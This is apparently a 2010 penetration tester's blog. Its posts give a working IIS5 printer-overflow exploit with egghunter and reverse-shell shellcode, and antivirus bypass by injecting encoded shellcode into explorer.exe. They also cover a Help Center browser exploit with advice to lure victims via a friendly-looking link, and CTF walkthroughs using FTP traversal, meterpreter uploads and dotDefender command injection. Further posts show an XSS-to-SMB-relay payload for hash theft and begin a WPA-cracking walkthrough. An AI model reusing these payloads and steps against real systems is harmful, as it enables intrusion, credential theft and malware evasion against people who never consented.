Wednesday, November 24, 2010

Blast From The Past

Recently on a test I ran into a windows 2000 server running iis5 with the Internet Printing module enabled, I was quite surprised by this but...a shell is a shell right? Since this was on the job and I wasn't wearing my cowboy hat I fired up my windows 2000 VM (who doesn't have one of those?) and went to work. Metasploit has a module for this vuln (exploit/windows/iis/ms01_023_printer) but surprisingly it is pretty flakey. On the first run of the exploit module it did not work so I took a look at my configuration of IIS again to make sure that everything was setup properly. After confirming IIS settings I tried the module a couple more times and finally was able to get a shell. I restarted IIS and tried the module a few more was still hit or miss - sometimes it would work on the first try sometimes it would take three tries, something was strange....

After breaking out immunity debugger it became clear as to why the exploit did not work everytime. According to the metasploit module the shellcode was being held at an offset of EBX and with a short assembly stub we jump to that location (see metasploit snippet below)

buf = make_nops(280)
buf[268, 4] = [target.ret].pack('V')

# payload is at: [ebx + 96] + 256 + 64
buf << "\x8b\x4b\x60" # mov ecx, [ebx + 96]
buf << "\x80\xc1\x40" # add cl, 64
buf << "\x80\xc5\x01" # add ch, 1
buf << "\xff\xe1" # jmp ecx

sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")

While this does work, it appears that sometimes the payload is not within the window and the exploit is not successful. Since we know about where in memory our payload will be when we gain control of EIP seems like a good place to use an egghunter :) I started out with an existing egghunter ( and modified it a little since I know about where in memory my payload is there was no sense looking everywhere for it :) A warning ahead of time - I was lazy and nop'd out the access violation check...I had plenty of bytes to burn ;) -

mov edx, ebx #ebx is the area of our starting point
or dx, 0fff
xor dx,0fff #clear out the bottom half of edx for the start of our loop
inc edx #increment edx - this is the start of our loop
nop #abbreviated nops where the original access violation check was
mov eax, 57303054 #load our egg "W00T"
mov edi, edx #set edi to point at our current location in memory
scas dword ptr es:[edi] #compare our egg to dword at edi
jnz #jump back to the start of our loop (inc edx) if we didnt find the egg
scas dword ptr es:[edi] #compare our egg to the next dword for the 2nd part of the egg
jnz #jump back to the start of our loop (inc edx) if we didnt find the 2nd egg
jmp edi #jump to edi as it points to the first byte after our egg
After implementing the egghunter into the exploit I had no issues getting a shell everytime :)

Full exploit below - obviously will have to change the shellcode for it to work for you -

import urllib2
import sys

shell= "T00WT00W"
shell +="\x90"*(10)

# msfpayload windows/meterpreter/reverse_tcp lhost= R|msfencode -e x86/alpha_upper -t c #
shell += ("\x89\xe1\xd9\xe8\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"


buff = 'A'*268 + '\x4d\x3f\xe3\x77' +"\x90"*5 + egghunter + '\x90'*156
useragent = 'Shit Bird'
header = {'User-Agent':useragent, 'Host':buff}

req = urllib2.Request('http://'+sys.argv[1]+'/NULL.printer?'+shell,headers = header)
res = urllib2.urlopen(req)

Friday, August 20, 2010

Open LockSport Donations

A slight divergence from the technical for a moment, everyone should go check out a cool new line of custom lock-picking tools that will be coming out shortly. Pre-Order yours by providing a donation to get the business started. I proudly donated a very large sum to this cause today and setup onsite training as well for a group of my friends with the creator of these lock-picks....

Check it out!!!

Generally I like to stay 100% technical posts but this guy was really cool, extremely excited about what he does and thats what I like to see!!! Motivated people with passion about their interests... I am always about supporting individuals like this... So check them out and get yourself a nice set of custom lock-pick tools...

And if youre in the cleveland area and interested in lockpicking, send me a message and i will let you know about lockpicking meet ups.

Tuesday, August 17, 2010

Bypassing AntiVirus With Process Injection

There is a new tool for anti virus bypass which allows an attacker to inject shellcode into a process Post exploitation. Enabling the attacker to pass a shell to a remote location, generally i assume this would be a meterpreter shell for obvious reasons. Those of us who penetration test for a living are aware of the need to sometimes have a shell after obtaining gui system access. Buuuut Antivirus can be a real pain in the ass sometimes.

A few people came to me today saying they tried this new technique and it looked awesome but was not functioning correctly, below is a description of why it was not working for them and how to fix it.. here is a link for the program as reference.

Videos are cool and all but as we know they tend to leave things out, in this case they left out the proper way to create shellcode. They also left out how to create the file to inject into the process, so below is a walkthrough without missing any details of how to get a shell by injecting into a process with injector... Honestly, I wish people who developed tools would not leave out details in their videos. I also wish they would learn to talk and explain things as they create the video rather then having a distracting song..

Mainly I believe the issues people were having are of bad character sets within their shellcode. (Although I did not verify this in a debugger, the crash behavior leans towards this assumption)

When you inject a payload into a process if any characters are bad such as a Null characters the process will automatically terminate or create undesired results, it doesn't always have to be null and all processes and programs are created differently depending what they are looking for.Encoding is a good way to solve these issues. So lets get to it!!

Original Video:

Issues people had:
-Injecting into Explorer.exe crashes the process... (explorer being a good process because it re-spawns)

-Alpha upper encoding
-using the py file to create raw code

So basically the problem people were having is that there are bad characters in their shellcode that were crashing the process, following is a step by step on how to use the antivirus bypass technique that the video does not show clearly and in its entirety....

1. First Create your shell-code: (Alpha upper encode the shellcode, and add a thread exit function)

root@Ficti0n:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread R | ./msfencode -e x86/alpha_upper

[*] x86/alpha_upper succeeded with size 699 (iteration=1)
buf =
"\x89\xe6\xdb\xd8\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" +

The output from this will be very large but no worries size doesn't appear to be an issue....

2. Put this shell-code into the file like so (Remove all + signs and surround the output with parenthesis)

................. )


3. Startup your multi-handler and after you receive the payload you will get a shell... (go to step 4 below to send off your payload.)

msf > use multi/handler
msf exploit(handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
LPORT => 4444

msf exploit(handler) > exploit

[*] Started reverse handler on
[*] Starting the payload handler...
[*] Command shell session 1 opened ( -> at Tue Aug 17 20:30:20 -0400 2010

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator> YAY FOR SHELL

4. Check your process list for Explorer.exe then ship off your payload into the process, this payload is now encoded to remove all bad characters and with your multi/handler running you should receive a shell no problem.

C:\Documents and Settings\Administrator\Desktop\injector>tasklist

Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 244 K
smss.exe 620 Console 0 388 K
csrss.exe 668 Console 0 1,660 K
winlogon.exe 692 Console 0 5,152 K
services.exe 736 Console 0 4,312 K
lsass.exe 748 Console 0 1,544 K
vmacthlp.exe 904 Console 0 2,292 K
svchost.exe 920 Console 0 4,548 K
svchost.exe 1000 Console 0 4,012 K
svchost.exe 1092 Console 0 21,824 K
svchost.exe 1136 Console 0 3,060 K
svchost.exe 1212 Console 0 4,584 K
spoolsv.exe 1416 Console 0 5,476 K
sqlservr.exe 1800 Console 0 8,684 K
sqlwriter.exe 1948 Console 0 3,268 K
notepad++.exe  2104 Console                 0      3,072 K
notepad.exe 3612 Console                 0      3,388 K
explorer.exe 1568 Console                 0     22,064 K
tasklist.exe 1900 Console                 0      4,244 K
wmiprvse.exe 2708 Console                 0      5,404 K

C:\Documents and Settings\Administrator\Desktop\injector>injector.exe pgeneric.txt 1568

[*] Author: DouBle_Zer0
[*] HACKERS GARAGE Production
[*] Visit Us:

C:\Documents and Settings\Administrator\Desktop\injector> Your payload was just sent!! check your meterpreter

I hope that clears a few things up for anyone who was asking me how to utilize this tool on a pentest, this is an excellent technique and very neat but explanation of proper payloads and examples were lacking, I would have much preferred a written write up with more detail for reference so that is what i am providing..

Final Note:
Also one final note, you will notice i used the "explorer.exe" process, the reason I used explorer.exe because if I blow it up, it will respawn itself. Also a good technique when migrating processes in Meterpreter, if explorer.exe Fubars, you can just kill the process and it will respawn.  I have used this technique on processes running as a domain administrator to get full domain access. However when I blew up the process I lost access but was able to just respawn it and regain my foothold when no hashes or tokens were available.


Friday, June 11, 2010

Windows XP Help Center Client Side Attack

I Just saw this exploit in full disclosure and ExploitDB:

Then I checked in metasploit and the exploit is already available.

If you are on an internal or client side test penetration test I generally see most clients running windows XP  and generally outdated browsers. They are either using IE6 or IE7 or IE8.... The essence of this attack is that an un-handled XSS is utilized in hcp://system/sysinfo/sysinfomain.htm?svr=, which can be directly accessed via a url in a browser. By using a defer in a XSS to execute a script in a privileged zone a windows popup is bypassed.

<script defer>code</script>

"due to insufficient escaping in GetServerName() from sysinfo/commonFunc.js, the page is vulnerable
to a DOM-type XSS. However, the escaping routine will abort encoding if characters such as '=' or '"' or others are specified. "

This exploit works on xp sp2 and sp3 which covers most clients in most companies. I do not see many companies running vista or windows7.... IE 6 and IE7  browsers are vulnerable to this attack however IE8 works but with a user popup box unless the victim is running certain versions of media player...  I also just tested this with a IE8 browser running in comparability mode...  When the client visited the page Automatically the exploit pulled up the help docs and gave me a meterpreter shell   wooooot

I am thinking this would be a good exploit to use in client side penetration tests... So below is the info and a quick usage of the exploit...

Module Name:

Below is a description and then usage of the module... give it a try...

Description: (From Metasploit)
  "Help and Support Center is the default application provided to
  access online documentation for Microsoft Windows. Microsoft
  supports accessing help documents directly via URLs by installing a
  protocol handler for the scheme "hcp". Due to an error in validation
  of input to hcp:// combined with a local cross site scripting
  vulnerability and a specialized mechanism to launch the XSS trigger,
  arbitrary command execution can be achieved. On IE6 and IE7 on XP
  SP2 or SP3, code execution is automatic. On IE8, a dialog box pops,
  but if WMP9 is installed, WMP9 can be used for automatic execution.
  If IE8 and WMP11, a dialog box will ask the user if execution should
  continue. Automatic detection of these options is implemented in
  this module, and will default to not sending the exploit for
  IE8/WMP11 unless the option is overridden."

Simple Usage Example:
msf > use windows/browser/ms10_xxx_helpctr_xss_cmd_exec
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LHOST
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LPORT 5555
LPORT => 5555
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on
[*] Using URL:
[*]  Local IP:
[*] Server started.

Send Your Link to the Victim and wait: 

Now send the victim out a link to your IP address via email or chat. Generally i would have a registered URL that looks friendly and send them that URL in order to not look too suspicious.

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > [*] Request for "/" does not contain a sub-directory, redirecting to /c3hfRM5Kh/ ...
[*] Sending Microsoft Help Center XSS and Command Execution to
[*] Responding to request for exploit iframe at
[*] Request for "/" does not contain a sub-directory, redirecting to /ETnOhHE9EqYirlA/ ...
[*] Responding to WebDAV OPTIONS request from
[*] Request for "/Vl" does not contain a sub-directory, redirecting to /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending directory multistatus for /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending EXE multistatus for /Vl/ly.exe ...
[*] Request for "/Vl" does not contain a sub-directory, redirecting to /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending directory multistatus for /Vl/ ...
[*] GET for payload received.
[*] Sending stage (748032 bytes) to
[*] Meterpreter session 1 opened ( -> at Fri Jun 11 18:10:38 -0400 2010

msf exploit(ms10_xxx_helpctr_xss_
cmd_exec) > sessions -l

Active sessions

  Id  Type         Information                      Connection
  --  ----         -----------                      ----------
  1   meterpreter  EXPLOIT\Administrator @ EXPLOIT ->

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: EXPLOIT\Administrator

Final Notes:

There you have it... This module sets up a server and waits for your victim to make a connection, when the victim does make a connection their help window is opened and they are silently owned.... More then likely the victim will just think windows is acting up as it usually does or they accidentally clicked something  :) :)  Maybe you should be using freebsd or slackware instead?  You might still get owned but at least you will know its not the OS acting up hahahaha

Monday, May 10, 2010

Offensive Security Part 2 -- KilltheN00b Walk Through

How Strong is Your FU hacker challenge Part 2

Target 2: KilltheN00b

After some chips, salsa and a supersized burrito from el habinaro i was down for anouther challenge. I logged into the offsec labs and reviewed some of the documentation on the contest page that stated there were 2 targets.


After a quick portscan I chose to attack killthen00b purely based on the amount of open ports available on the system. Ghost provided port HTTP only. KilltheN00b had various ports open including FTP, HTTP and some various mail ports.

Scan output:
21/tcp   open  ftp
|_ftp-anon: Anonymous FTP login allowed
25/tcp   open  smtp          Surgemail smtpd 3.8k4-4
80/tcp   open  http          Surgemail webmail (DNews based)
|_html-title: SurgeMail Welcome Page
106/tcp  open  pop3pw        Qualcomm poppassd (Maximum users connected)
110/tcp  open  pop3          SurgeMail pop3d 3.8k4-4
143/tcp  open  imap          SurgeMail imapd 3.8k4-4
366/tcp  open  smtp          Surgemail smtpd 3.8k4-4
465/tcp  open  tcpwrapped
587/tcp  open  smtp          Surgemail smtpd 3.8k4-4
993/tcp  open  tcpwrapped
995/tcp  open  tcpwrapped
3389/tcp open  ms-term-serv?
7025/tcp open  tcpwrapped
7443/tcp open  tcpwrapped

More ports = = more fun ??
More Targets = = more fun??
All Girls Just want to have fun?? Wait no that's a song LOL

Probably a wrong assumption, but its a good theory to cling to when things get rough

Initial FTP probing:
First thing i did was log into the FTP server with credentials that were provided on the offsec page. After logging into the FTP server there wasnt much to play with in any  available directories so i decided to try to hop out of the FTP environment.

I tried to hop out of the ftp directory structure via directory traversal attacks with "cd ../../../../../"... Failed, so I then flipped the slashes to "cd ..\..\..\..\..\" and the response back indicated a fail. So i decided to directly call the root directory with "cd c:". 


Cd C:  correctly hopped me into a directory with loads of files available. I also seemed to be able to browse to a directory with system32 files. My actual first thought was to replace the system32 directory program Magnify.exe with my evil payload so that at the Remote desktop login  the accessibility options would become a shell. But unfortunately I didnt have access to write to that directory so i moved on. After browsing files for awhile I decided this ftp session was a bust and logged out.

Next I decided to hit up the web page located on KilltheN00b. The webserver indicated an application by the name of "surgemail".

Also i noted the scripts directory on this site seemed to execute pages with a EXE extension. Very interesting...

I then checked the exploit databases and verified an exploit for the version of surgemail running that was valid for windows 2000 and 2003.

 Next I decided to check the remote desktop port to find out killthen00b was running a Win7 operating system and the exploit would need modification before it would work.  This was a


I loaded up the debugger and started modifying the exploit and realized that I was unable to control EIP after a bit of wrestling with the exploits located on exploitDB... Either due to my lack of advanced level exploitation or the differences in operating systems or its protection mechanisms i only had control of certain parts of the stack but no EIP overwrite. To be correct, rather partial overwrite of EIP in this exploit which utilized the OS already providing a zero byte on the first byte of the 4 byte EIP to bypass filters on insertion the overflow utilized what was already present, (I like that) otherwise our null stop execution of the program prematurely.

Before going further with this I realized this exploit was a post authentication exploit and would need a user account. grrrr

More Web:
 I browsed around the the surgemail pages for awhile trying attacks against authentication and authorization without much success till i hit a /domainadmin management page. On this page i was able to guess a password of test/test using burp "comparer" to compare my responses and noticed one of the outputs said "Account Details". I then verified that I could log into the server by logging into another port used for changing passwords "poppassd" located on port 106.  The found login worked,

Woot i could now use that exploit if i can get the exploit to work.. however this was still a fail after messing with it for a few hours. 

Back to FTP:
After noticing the EXE files with a possible execution on the webpage i decided to hit the FTP session back up and see if I can get to the scripts directory. After messing around for awhile I realized that the "cd ..\..\" actually was working and after a few iterations got me to the root directory. I browsed to the surgemail/scripts directory

ftp> cd ..\..\..\
250 Directory changed to "/MyDocuments/............./......../......".
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for listing
dr-xrwx--- 1 admin users              0 May 03 22:58 $Recycle.Bin
dr-xrwx--- 1 admin users              0 Jul 13 2009 Documents and Settings
dr-xrwx--- 1 admin users              0 Jul 13 2009 PerfLogs
dr-xrwx--- 1 admin users              0 May 03 19:20 Program Files
dr-xrwx--- 1 admin users              0 May 03 19:21 ProgramData
dr-xrwx--- 1 admin users              0 May 03 22:51 Python26
dr-xrwx--- 1 admin users              0 Apr 30 01:21 Recovery
dr-xrwx--- 1 admin users              0 May 07 23:48 surgemail
dr-xrwx--- 1 admin users              0 May 03 22:38 System Volume Information
dr-xrwx--- 1 admin users              0 May 07 23:48 Users
dr-xrwx--- 1 admin users              0 May 03 21:28 Windows
-r--rr---- 1 admin users             24 Jun 10 2009 autoexec.bat
-r--rr---- 1 admin users             10 Jun 10 2009 config.sys
-r--rr---- 1 admin users     2147016704 May 07 23:44 pagefile.sys
-r--rr---- 1 admin users       12645888 May 03 05:53 surgemail_installer.exe
ftp> cd surgemail
250 Directory changed to "/MyDocuments/............./......../....../surgemail".
ftp> cd scripts
250 Directory changed to "/MyDocuments/............./......../....../surgemail/scripts".

I then tried uploading a test file and it worked.... at this point i got pretty excited and went into explotation mode.

Meterpreter Evil.exe:
I now i needed an evil EXE file to have the webserver serve up for me on behalf of the killtheN00b host. So i popped open metasploit..

Create a reverse_tcp meterpreter shell.
root@ficti0n:~# cd /pentest/exploits/framework3
root@ficti0n:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > evil.exe
Created by msfpayload (
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=,LPORT=4444

Now we have our test shell to try, which I then uploaded to the ftp server in the surgemail/scripts directory this directory also contained other exe files such as webmail.exe

Back to the web part 2: the evil upload

Back on the web it was time to browse to the scripts directory and cross my fingers and toes, along with yelling at my friends to cross their fingers and toes too!!!  Very important that all the bases are covered in information security..

Offensive Security in depth!!!  or something like that.. (Wishful thinking)

So i started a multihandler for metasploit first, just in case the reverseshell worked.
msf > use multi/handler
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler...
I then proceded to browse to the directory with all bodyparts crossed.....Hoping for connect back


My connection status in metasploit then indicated i had an open session.  :)

Post Explotation:
With a shiny shell in hand I first dropped the hashes via meterpreter hashdump but i noticed from the sequence of charactors the LM hashes were blank.  So I decided to just create my own user using the following scenerio.

Get higher privilages:
meterpreter > getsystem system (via technique 1).

Add a new domain admin:
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > add_user ficti0n
[*] Attempting to add user ficti0n to host
[+] Successfully added user
meterpreter > add_localgroup_user Administrators ficti0n
[*] Attempting to add user ficti0n to localgroup Administrators on host
[+] Successfully added user to local group

But i like GUI's so lets get remote desktop, and I noted in an earlier attempt to log into window with my ftp credentials that i needed to be part of the remote desktop users group.. so lets be part of the cool kids group shall we??

Get a Remote Desktop Gui:
meterpreter > add_localgroup_user "Remote Desktop Users" ficti0n
[*] Attempting to add user ficti0n to localgroup Remote Desktop Users on host
[+] Successfully added user to local group

SCORE I can now login with domain admin on a pretty gui interface provided by microsoft.. Thanks microsoft :)  and thanks metaploit.

After logging into the windows7 machine I quickly found my proofs.txt and added it to the online scoreboard to raise me up to 50pts total.  Job well done...Thanks to steponequit and carnalownage and sygog for calaborating on attack possibilities, sometimes multiple minds work better even if its not the solution possibilities for the future arise

Lessons Learned:
-Dont listen to other peoples chatter and take it as truth.While I was in IRC everyone was talking about compiling code and getting payloads correct..
-I knew better, I knew there was an easier way and only wasted a limited amount of time on exploit writing. I am sure there is a way to transfer that exploit but messing around all day isn't going to get me past the challenge.
-Again go with your initial observations of the application. My observation that the webpage was executing EXE files ultimately got me into the application even though i veered off the path for awhile listening to people in the IRC chat about payloads.
-Also again always trying things twice and CONFIRM.... Initially i thought i didn't have the traversal. it turns out i did 3 hours before I used it!

-Check the ACL's and the Jails on your FTP servers and make sure they are not traverseable.
-Review your applications for any known exploitable 3rd party software and update
-Do antivirus checking on file uploads to stop payloads from being uploaded and executed
-Do egress filtering to stop unnecessary ports from calling back to listeners on attackers machines

Get a HUGE security budget and hire me to run all your penetration tests for twice your average cost!!! Preferably from the beach externally :) Dont forget to add redbull and sourpatch kids to the budget!!!  They are ESSENTIAL to my findings.

Closing notes:
I then went to the gym to wake up my forgotten muscles from sitting around all day and night... This was over 24 hours into this Challenge, I cheated and took a little (LONG)  nap somewhere in there too.. I know I know.. sleeping on the job, but hey there was a pillow close by and I ran out of the redbull..

Up next:  Part 3
Dropping shells on the Ghost and watching him laugh as he ultimately owns me!!!! 

Offensive Security n00bFilter Walk Through

How Strong is Your FU hacker challenge

Target 1: N00bFilter

The first target in this weekend’s offensive security challenge was nicknamed n00bfilter as it was used to weed out all the n00bs who would plague the internal Offsec networks with high bandwidth unnecessary tools such as Nessus or Webinspect hoping for an easy hit. Tools like these, while useful, are not going to directly aid you in exploitation of this CTF challenge. Your BRAIN is the only valid tool in an offsec challenge. At first glance n00bfilter appears to be a login and password prompt to an application with no other available options but username and password. Source looks pretty standard as well.. Nothing special, no JavaScript or includes to be had.

First Clue: Error Message

Like most pentests your first inclination would be to post a single quote or random character into the field and see if it errors out. After adding a single quote I was presented with a taunting answer of "HAHAHA" rather than the expected sql error or perhaps invalid character. Upon further inspection of the error pages source code it was noted that this was an Applicure error message. Applicure being the vendor of Dot Defender a well known Web Application Firewall (WAF). I found it interesting that a n00bfilter would be running an ids/ips product and started performing further probing of the application.

Annoyance: cool out periods

I then started trying default user/pass combinations such as admin/admin admin/password. Anything that a normal administrator would FAIL to implement changes to. This led me nowhere quickly at which time I started losing my connection to the application.  After roughly 5minutes i was back online and figured my internet connection was foobarred... Got to love sketchy cable connections right?? I swear they do bandwidth limiting but whatever.. LOL   A few minutes later I was blocked again, and again, and again.... Apparently Dot Defender was set to "Cool me down” when I got out of control.... Very NOT COOL..... This annoyed me becuase I was manually probing the application. This application also appeared to vary its cool outs based on what you were doing, messing with the URL, messing with the input fields, certain characters, some may be ok others blocked you immediately, then sometimes after a few tries... Interesting the application has a personality apparently.

Thought: Dot Defender bypass

When I started getting owned by dot defender over and over again I started to think maybe I have to shut the WAF down or at least add my IP address to a list of friends within the dot defenders configurations. But how??
I immediately started researching dot defender weaknesses and vulnerabilities on my good friend Google and this was found...

Full Disclosure:
The above link states that Post Authentication there is a vulnerability that allows an attacker to run commands on the operating system via the delete site method. Hmmm “post authentication”. This means I need credentials, bullocks!! I don't have credentials

Ok back to google, the google gods then provided me with a few tidbits of information regarding Dot Defender, one useful piece of information being that DotDefender site manager was located a /dotDefender. I browsed to this address and sure enough I was prompted with a basic authentication login prompt that told me its username was "Admin". Now I have a login name the struggle is half over right? so i tried all the default password combos and a few random passwords based on the site and the challenge.


Dont Second Guess yourself:

Figuring that a vulnerability on full disclosure was not going to be the issue and especially being post auth on a n00bFilter I moved back to probing the app... I went at it for awhile with combination's of character encodings and character assembly that might fool the WAF into either letting my attacks through the firewall or removing just enough of the attack to reassemble the attack for me.. Attacks such as <scr><script>ipt> or other combination's using various
encoding techniques...

Again FAIL!!

Social Networking:

So I remember the hints said to stay in touch via twitter and IRC. I pop up the IRC channel and its a bunch of whiners complaining about a password being changed.. I was just thinking “WHAT PASSWORD”. I felt out of the loop at that point but I know better then to ask Muts a direct question, I already know the answer.. “TRY HARDER”  this is offensive securities mantra which answers every inquiry. So instead I got some redbull and thought it over for a few and noticed that the IRC channel said the passwords were now reset to the original values.

Dot Defender again:

Knowing that the only password not behind dot defenders tyrannical rule was the basic auth login for dot defender, i decided gave Dot Defender a second go. The very first combination I tried popped open the application with the password of  “password” and a # symbol at the end of the index page value, someone had suggested I try the # earlier.

Apparently the first few people past the login started changing the password to keep others from catching up to them.... Sneaky little terrorists threw me off my game. So now it was time to try my post authentication exploitation from full disclosure.. :)

Post Auth:
Opening up Burp Proxy a well known application proxy I started browsing the Dot Defender site manager. I was presented with a page that allowed me to add and DELETE sites. I created a fake test site and then set my proxy to capture a request. Once I captured a request I sent it over to a module in burp by the name of “repeater”, repeater allows you to keep making the request over and over again manually manipulating the values. Since I had an example delete request and I had the delete example on the full disclosure vulnerability, I modified my request with the vulnerable values.

POST /dotDefender/index.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

sitename=testsite&deletesitename=testsite;id;ls -al;

In the web response was the output of my command injection. I injected an “ls” command which in unix lists the contents of a directory. I thought to myself, ok so that’s cool but I need to find a certain file to show that I passed the challenge. Running burp requests looking for this file is waaaaay to tedious for me. So I used another familiar unix command. The “find” command.

sitename=testsite&deletesitename=testsite;id;find / -name 'n00bSecret.txt';pwd;&action=deletesite&linenum=12

The n00bSecret file was found quickly so I used the “cat” command to list out the contents of the file with the proof of passing the first challenge.

sitename=testsite&deletesitename=testsite;id;cat /opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt;pwd;&action=deletesite&linenum=12

I browsed out to the contest scoreboard page and added in my shiny new proof key imediatly since I knew there was a 10 minute time limit between exploitation and acceptance. Accepted 25 points added to my account and a shiny new VPN login will be provided to me within 5 minutes time!!!

Mexican food:
At this point I decided it was time for some Mexican food, I was fiendish for some chips and salsa all day long. I passed the n00b challenge being the 30th contender out of a possible 100 slots. Note that the 100 slots were not filled till 24 hours after this point.. :)    Not too horrible but again could be much better!!

Lessons Learned:

Dont second guess your observations and research. I was thrown off the path because sneaky contestants were changing the scope of the competition. Observe every detail of the source and what you are presented with and try things more than once! They just might work the second time... At this point 5 hours of the competition were wasted on something that should have taken me less than 2 hours. Or even 30 min if I was quick with it.

Dot Defender Remediation:

There is a patch available for this vulnerability from Applicure, just patch your app!! Also according to this other post by Applicure it only effects Linux running Apache. Response by Applicure in the link below.

Next up, how to own killthen00b 

Thursday, April 15, 2010

Combining XSS and SMB-Relay

I found this to be an interesting way to make XSS useful in say an internal pentest on a local application, or perhaps on a client side test via emails to users you enumerated google hacking or through maltego.  You can simply use XSS to call a non existent share on a host running a listener and force a windows user issue their hashes to your listener and gain a shell.

Setting up SMB_Relay in Metasploit:
Open up a metasploit session:

root@ficti0n:~# /pentest/exploits/framework3/msfconsole

       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 490 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
       =[ svn r8091 updated 6 days ago (2010.01.09)

msf > use exploits/windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb_relay) > set LHOST  <-- Whatever this metasploit server is
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
msf exploit(smb_relay) >
[*] Started reverse handler on port 4444
[*] Server started.

XSS your Client:
Once your listener is setup on your backtrack server running metasploit you can then run your cross-site-scripting attack against the Client. This attack can be accomplished with the following script string which tries to open a share on the attack server. Put the string below into any parameter that is vulnerable to cross site scripting, just change the IP address to the ipaddress of your server which is running the metasploit smb_relay listener.

<script language='Javascript' src="\\\c$"></script>

When the XSS link is clicked you will see network hashes race across the output of the metasploit console.  Basically the client that is being XSS'd is sending over their windows credentials to try to open a network share. Metasploit at this point is passing the hashes back to the client and opening a meterpreter session gaining shell access. This is how its working as I understand the process.

[*] Authenticating to as Ficti0n-1C10DB\Administrator...
[*] AUTHENTICATED as Ficti0n-1C10DB\Administrator...
[*] Ignoring request from, attack already in progress.
[*] Sending Access Denied to Ficti0n-1C10DB\Administrator
[*] Received \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 Service Pack 2 LM:
[*] Sending Access Denied to \
[*] Received Ficti0n-1C10DB\Administrator LMHASH:ff227wf24924844095c91577w265de85ebb20w9e9f146319 NTHASH:ff227df2492d844095c91577w265de85ebb20b9w4f178319 OS:Windows Server 2003 3790 Service Pack 2 LM:
[*] Authenticating to as Ficti0n-1C10DB\Administrator...
[*] AUTHENTICATED as Ficti0n-1C10DB\Administrator...
[*] Ignoring request from, attack already in progress.
[*] Sending Access Denied to Ficti0n-1C10DB\Administrator

At this point you can click into the Metasploit window and issue the following commands to take control of the client machine.

msf exploit(smb_relay) > sessions -l

Active sessions
Id  Description  Tunnel

1   Meterpreter ->

msf exploit(smb_relay) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >  

You are now logged into the Clients machine as system and can perform any actions that you wish under the context of a System account. Create users, dump hashes, and use the system as a jump point into other systems on the local network. This is all pretty simple stuff but I thought it was pretty cool to just issue it from an XSS attack since I dont see good XSS examples to often. usually just how to grab a cookie. 

Combining this with CFS:

Other good ideas for this attack would be to embed this into a header of a site you control via a cross frame scripting attack. You can then encapsulate a whole valid page in an iframe and the user will never know unless they look at the url... however you can always just register a similar URL to trick a user while silently be passing their credentials... 

Of course egress filtering of outgoing ports will prevent this attack.. most people do not egress filter however.

Friday, February 19, 2010

Airolib-ng WPA cracking walk through

I use to crack my WPA passwords with cowpatty precomputed hashes, but another way to crack WPA with hashed values is to create airolib databases with lists of SSID’s and Passwords. Airolib will create these databases with SQLite3. This is convenient because you can have more than one SSID and Password list in each database.  If you are in an area with multiple SSID’s running WPA you can note all of the SSID’s in a list and import them into the database.  This is great because when doing a packet capture in an environment with multiple WPA encrypted networks, the attacker can crack any of the 4way Authentication Handshakes with the same database file.  Below is a play by play of cracking a WPA wireless network using the airolib/aircrack method.   
